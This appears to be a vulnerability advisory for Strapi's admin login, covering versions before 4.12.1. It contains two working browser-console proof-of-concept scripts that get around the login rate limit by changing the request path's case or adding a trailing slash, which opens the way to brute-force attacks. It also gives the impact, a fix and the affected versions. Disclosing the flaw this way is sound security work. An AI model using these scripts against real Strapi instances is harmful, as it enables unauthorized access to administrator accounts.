9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
27.5%
There is a rate limit on the login function of Strapi’s admin screen, but it is possible to circumvent it.
It is possible to avoid this by modifying the rate-limited request path as follows.
Access the administrator’s login screen (/admin/auth/login
) and execute the following PoC on the browser’s console screen.
// poc.js
(async () => {
const data1 = {
email: "[email protected]", // registered e-mail address
password: "invalid_password",
};
const data2 = {
email: "[email protected]",
password: "RyG5z-CE2-]*4e4", // correct password
};
for (let i = 0; i < 30; i++) {
await fetch("http://localhost:1337/admin/login", {
method: "POST",
body: JSON.stringify(data1),
headers: {
"Content-Type": "application/json",
},
});
}
const res1 = await fetch("http://localhost:1337/admin/login", {
method: "POST",
body: JSON.stringify(data2),
headers: {
"Content-Type": "application/json",
},
});
console.log(res1.status + " " + res1.statusText);
const res2 = await fetch("http://localhost:1337/admin/Login", { // capitalize part of path
method: "POST",
body: JSON.stringify(data2),
headers: {
"Content-Type": "application/json",
},
});
console.log(res2.status + " " + res2.statusText);
})();
429 Too Many Requests
)/admin/Login
) and make a request again to confirm that it is possible to bypass the rate limit and log in. (200 OK
)// poc.js
(async () => {
const data1 = {
email: "[email protected]", // registered e-mail address
password: "invalid_password",
};
const data2 = {
email: "[email protected]",
password: "RyG5z-CE2-]*4e4", // correct password
};
for (let i = 0; i < 30; i++) {
await fetch("http://localhost:1337/admin/login", {
method: "POST",
body: JSON.stringify(data1),
headers: {
"Content-Type": "application/json",
},
});
}
const res1 = await fetch("http://localhost:1337/admin/login", {
method: "POST",
body: JSON.stringify(data2),
headers: {
"Content-Type": "application/json",
},
});
console.log(res1.status + " " + res1.statusText);
const res2 = await fetch("http://localhost:1337/admin/login/", { // trailing slash
method: "POST",
body: JSON.stringify(data2),
headers: {
"Content-Type": "application/json",
},
});
console.log(res2.status + " " + res2.statusText);
})();
429 Too Many Requests
)/admin/login/
) and make a request again to confirm that it is possible to bypass the rate limit and log in. (200 OK
)It is possible to bypass the rate limit of the login function of the admin screen.
Therefore, the possibility of unauthorized login by login brute force attack increases.
Forcibly convert the request path used for rate limiting to upper case or lower case and judge it as the same path. (ctx.request.path
)
Also, remove any extra slashes in the request path.
CPE | Name | Operator | Version |
---|---|---|---|
@strapi/admin | lt | 4.12.1 | |
@strapi/plugin-users-permissions | lt | 4.12.1 |